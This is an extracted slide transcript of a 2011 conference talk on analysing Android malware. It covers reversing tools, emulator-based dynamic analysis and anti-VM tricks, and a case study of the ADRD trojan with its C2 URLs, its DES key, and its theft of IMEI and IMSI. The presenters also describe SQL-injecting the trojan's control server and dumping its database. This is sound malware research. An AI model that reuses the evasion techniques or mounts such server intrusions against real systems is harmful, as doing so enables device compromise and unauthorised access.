Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside my Android phone [Rooted CON 2011]

! Lost in translationWTF is happening inside my AndroidPhone Ok Cancel

8:30 PMContents Contents Android System Static Analysis Dynamic Analysis Reversing Red Bunny Conclusion Cancel

8:30 PMAndroid architecture

8:30 PM DALVIK VM - Register-based virtual machine - It uses its own bytecode, not Java bytecode. - Run on a slow CPU with little RAM.- Run on an operating system without swap space. - Optimized for memory efﬁciency. - Dex class ﬁle format.

8:30 PMDex ﬁle format header string_ids type_ids proto_ids ﬁeld_idsmethod_ids class_defs data

8:30 PM Analysis EnvironmentToolsCase-sensitive ﬁle system :DAndroid SDKAndroid NDKAndroid source codeEclipseApktool, Dex2jar, JD-GUIAndroid Emulator

8:30 PM Example .java/jd-gui Compiler dex2jar .java/source .dex/dexdump .smali/baskmalibaskmali

8:30 PM Anti-analysis Examples:- Easy: Use a.class and A.class as class names: the ﬁle willbe hidden on case-insensitive ﬁle systems.- Medium: Optimize/ofuscate the code with ProGuard.- Hard: Modify bytecode to break reversing tools (besure that it still runs on Dalvik.) if self.__value_type >= VALUE_SHORTEj: androguard-a1: ... elif self.__value_type == VALUE_ARRAY : ... elif self.__value_type == VALUE_BYTE :Insert value type ...VALUE_ANNOTATION elif self.__value_type == VALUE_NULL : ... elif self.__value_type == VALUE_BOOLEAN : ... else : raise(“oops”)

8:30 PM Dynamic Analysis Basic:- Create an Android Virtual Device. -> $android (SDK)- $emulator -port 5560 @virtual-device -tcpdump capture.pcap- $adb install app.apk- $adb shell monkey -v -p package.app 700- $adb shell logcat -d && $adb shell logcat -b events -d (radio also)- $adb shell /data/busybox ﬁnd / -type f -exec /data/busybox md5sum

8:30 PM Make it more real- Simulate phone events:Send SMS:echo sms send +34656566789 test | nc localhost 5554D/AT ( 32): AT< 00200b914356566687f900001120720274404004e3f0380cSimulate calls:$echo gsm call +34656566789 |nc localhost 5554$echo gsm accept +34656566789 |nc localhost 5554$echo gsm cancel +34656566789 |nc localhost 5554Change GPS coordinates:$echo geo ﬁx -82.411629 28.054553|nc localhost 5554

8:30 PM Dynamic Analysis Advance:- Create you own system image and modify the java classes to log theprogram ﬂow. Example, framework/base/core/java/android/os/Process.java

8:30 PM Compiling Android Kernel modules$git clone git://android.git.kernel.org/kernel/common$git branch -a$git checkout --track -b android-goldfish-2.6.29 origin/android-goldfish-2.6.29$adb pull /proc/config.gz ./;gunzip config.gz; mv config .configEdit and Add CONFIG_MODULES=y (disable by default onemulator kernel)$emulator -avd armv5y -kernel /tmp/zImage

8:30 PMSystem-Call Hooking $grep sys_call_table System.map

8:30 PM Anti-VM- Detecting the emulator is very easy:DEVICE_ID:String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);boolean emulator = TextUtils.isEmpty(id);Solution:Change secure->android_id on data/data/com.android.providers.settings/databases/settings.dbIMSI:TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE);String imsi = manager.getSubscriberId(); (00000... on emulator)Solution:Patch the emulator binary (search for +CGSN string) or the emulator source code (external/qemu/telephony/android_modem.c).

8:30 PM More Anti-VM- LocationManager.NETWORK_PROVIDER -> IllegalArgumentException- Detect ADB stuff.. process, network, debug enabled...- /proc/cpuinfo - > Hardware : Goldﬁsh- vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn’tchange)(Thanks Ehooo)- Qemu speciﬁc detection (Google)Solution:Patch emulator, Qemu, system hooking...

8:30 PM Alternatives to Android Emulator- http://www.android-x86.org/ . Supports VMware- Use a real phone... Slower

8:30 PM Attack Vectors- Alternative markets, repacked applications.-SMS, MMS vulnerabilities, Fuzzing!!!.- Wireless, Bluetooth Drivers- NFC- System componentes: Webkit,sound library, Kernel.

8:30 PM Third party softwareSource: http://android.git.kernel.org/

8:30 PM ADRD aka Redbunny- "Security Alert 2011-02-14: New Android Trojan ADRD Was Found inthe Wild by Aegislab" ( http://blog.aegislab.com/index.php?op=ViewArticle&articleId=75&blogId=1 ) ! Notification- "[…] Today, we found a new Android trojan,we call it "ADRD", which was not reported by any security vendors before.[…]"- Jaime Blasco and Pablo Rincón were working together,analyzing this malware on Feb 2, 2011:* Name: com.beautyfullivewallpaper* Date: Feb. 2, 2011, 1:49 p.m.- Also known as HongTouTou

8:30 PM Detection- Permission list: * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE,RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS..- Cipher module/library calls (DES): * init Ljavax/crypto/Cipher; Lcom/xxx/yyy/ddda; decrypt- Function calls to retrieve the IMSI/IMEI codes: * IMEI: getDeviceId Lcom/xxx/yyy/MyService; onCreate * IMSI: getSubscriberId Lcom/xxx/yyy/MyService; onCreate- HTTP Requests (GET and POST): * String str8 = "http://adrd.taxuan.net/index.aspx?im=" +(String)localObject; * adrd.xiaxiab.com POST /index.aspx?im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace3ed65910991f4dbd438af

8:30 PM Detection- Sends http requests through a proxy: * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http"); * HttpParams localHttpParams =localDefaultHttpClient.getParams().setParameter("http.route.default-proxy", localHttpHost);- Services: * com.xxx.yyy.MyService * .beauty.Beauty- Intents: * android.intent.action.BOOT_COMPLETED **** -> Boots at system startup * android.intent.action.PHONE_STATE * android.net.conn.CONNECTIVITY_CHANGE

8:30 PM Analysis I Service module (MyService): Sets a Proxy for GET/POST and- Sets the preferred apn 1 HTTP specially crafted headers- Runs each 12 hours (UA, MIME types)- Looks for speciﬁc APN network : 2 “CMWAP” || “UNIWAP” Cipher data moduleSend data to adrd.taxuan.net/ public static String encrypt/decrypt 3index.aspx?im=%s: Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");+ IMEI+ IMSI Loop+ Netway (preferred APN) + Decrypt response+ iversion + Switch(cmd) It depends on the+ oversion 4 + 0 Do nothing + 1 adad.StartGo() adad.StartGo() + 2 ParseO 5Sends http://adrd.xiaxiab.com/pic.aspx?im= + 3 UpdateHelper()+encrypt(IMEI+IMSIParses the big list of ulrs/referersB#1#963a_w1|http://59.173.12.105/g/ UpdateHelper installs the updateg.ashx?w=963a_w1 apk 6BBBB.Go() -> Retrieves search lists ofwap.baidu.comFixUrls(): Send random requests addingBAIDU_WISE_UID and HTTP_HEADERS. ParseO(): parse server response (number, ﬂags, tags..): Sends log data to control servers 6 T213607170863|12345|+ -10086+ abc -597| [ 6

8:30 PM Analysis II - Following the encryption routines, the DES key is found…: this.kk = "48734154";* UpdateHelper class: public class UpdateHelper { private static String savefilepath = "/myupdate.apk"; private Context ct; private int netway;* Benefit from visits to the content (Baidu) and bandwidth consumption (China Mobile &&Unicom) and also SMS charges.- Server URLs (there are more): http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA- We want to know more!!

8:30 PM Control Servers- adrd.xiaxiab.com from an eagle view:* Microsoft-IIS/6.0* Debug Enabled (Displaying .NET errors and backtraces)* Hidden paths to the .Net/aspx application* ALL is Chinese! (WTF!?!"·$%&/(?)- Possible vector attacks:* HTTP functions + DES key + pyDes = "legal" HTTP Requests (at least for the adrd server)

8:30 PM Control Servers - First results: Search* Exceptions in chinese. Google Translate is your friend* Errors at .NET (it didnt generate any html list/table, or view to use for data displaying)* We got a successful Sql injection after the last ciphered parameter :D).* User without admin privileges.* Permissions to run Backups + Shared Resources = Timeout * Other possibilities: + 1: Create a temporal db, with just one table each time, dump paginated rows and runbackups. Problem: Complex to do and complex to rebuild the original DB (Also the langdidnt help) + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our currentattacks were hidden by DES at the http logs, and its not usual to log all the db queries forperformance reason.

8:30 PM Database Information - All the scheme obtained: list of Tables, Fields, types, stored procedures- IMEI/IMSIs list (at least some of them), logs, keywords, Baidu accounts- The main stored procedure affected by the sql injection retrieves the URL of myupdate.apk, thatpoints to adrd.xiaxiab.com/down.aspx ! * Parameters: @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int* Store procedure: --if (@netwap=2) select T-1|T11 --select T3http://adrd.xiaxiab.com/down.aspx --select T213607170863|12345|+ -10086+ abc -597| [ --else --select T013607170863* Looks that they were considering the netwap (based on the mobile operator) as a criteria to sendcommands * TX (where X seems to be a command type) * 13607170863 is a phone number located at Wuhan

8:30 PM Database Scheme t_baiduHourPercent: autoid, mHour, mPercent t_ : myear, mmonth, mday, mhour, totalt_baidukeyword: keyword, viewcount t_ : way, flagt_baidukeywordflash: keywordt_baiduOrtherKey: keyword, viewcount t_ : keyword, flagt_baidupwd: id, way, username, pwd t_ _wap: keyword, flagt_baiduwayname: way, wayname t_ _wap_back : keyword, flagt_keywordResult: id, keyword, link, head, flagt_androidtemplog: id, imsi, way, result, createtime t_ _wap_back : keyword, flagt_keywordResult20100601: id, keyword, link, head, flag t_ : flagt_keywordResult20101108: id, keyword, link, head, flag t_ : keyword, createtimet_baiduHourPercent20101012: autoid, mHour, mPercentt_androidtemplog_backup: id, imsi, way, result, createtime t_ _wap: keyword, createtimet_androidtemperrlog: id, compresslog, decompresslog, createtime t_ : keyword, createtimet_androidtemplog_backup201101: id, imsi, way, result, createtime t_ _wap: keyword, createtimet_android : id, imei, imsi, logs, ip, createtime, netwayt_android : , , , , createtimet_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, useridt_ : way, maxClick, minClick, leaveTotalClick, leaveEffectClickt_ _wap_20100323: keyword, createtimet_ _wap_20100722 : keyword, createtime

8:30 PM Myupdate.apk- It uses the main package of the ADRD family xxx.yyy.- The update has other permissions: WRITE_SMS, READ_SMS,RECEIVE_SMS, SEND_SMS..- Looks like a google reader- It adds a local sqlite DB (keyword storage). go_g1_sms: id, keyword, type, flag go_g2_sms: id, keyword, keyword2- SMSObserver: * Replaces keywords on SMS’s. * Sends SMS!

8:30 PM Samples Package name Md5 Adrd Ver IVercom.beautyfullivewallpaper 4556a687a2845bf4dfac62c594938cf3 adrd.zt.cw.1 6com.yodesoft.yohandcar 6783cee889fa64df68af58a56ff6e362 adrd.zt.2 6com.binaryloft.live.winter aa5216da617839e818d83d8185da42b0 adrd.zt.jtj.2 6com.magicwach.rdefense 839c37f3a2c8d31561d28f619a2a712e adrd.zt.cw.3 6com.tat.livewallpaper.dandelion 5192ad05597e7a148f642be43f6441f6 adrd.zt.cw.4 6com.classicnerds.livewallpaper.HK b72724d8fc0f633194dcc3bd28eec026 adrd.zt.cw.5 7ﬁshnoodle.night_city a01ba26a34e55f71873782348ff5e074 adrd.zt.dxm.6 7com.appspot.swisscodemonkeys.steam cdfca19bf212adf3292e4fe677fe46a6 adrd.zt.cw.7 7kr.mobilesoft.yxplayer e3cc6c7af0d83fe322116254c01cf720 adrd.zt.cw.8 7com.labgency.wallpapers.waves 7d764347a0b0c9d11160d7a7684bf02b adrd.zt.dxm.8 7com.laucass.andromax 627f41c8f8e7ab007641c4a0c1d8ce1b adrd.zt.cw.9 7com.digitalchocolate.androidrollergapp 71c0a67daa544450d7c620a48cc059b0 drd.zt.cw.12 7proscio.wallpaper.shamroc e09782d35d72a769dc7454adb6d8e2e9 adrd.zt.cw.15 7 com.tt.yy f2596f8f3c52381318f62d1ab161c284 ?? ??

8:30 PM Infectionsg Geolocation

8:30 PM Infectionsg Infections by operator +20K different IMSIs Other affected operators: Far EasT one Peoples Telephone Company Hutchison 3G PCCW Mobile Sunday Hong Kong Telecom Smart One Mobile

8:30 PM Thank You ! Questions? Ok Cancel@jaimeblascob@PabloForThePPL

http://www.dragonjar.org	86
http://recocio.blogspot.com	8
http://blogubpli.blogspot.com	6
http://recocio.blogspot.com.es	4
http://blogubpli.blogspot.com.ar	3
http://blogubpli.blogspot.com.es	2
http://us-w1.rockmelt.com	1
http://twitter.com	1
http://a0.twimg.com	1

Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside my Android phone [Rooted CON 2011]

by RootedCON on Mar 10, 2011

Accessibility

Upload Details

Usage Rights

9 Embeds 112

Statistics

Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside my Android phone [Rooted CON 2011] Presentation Transcript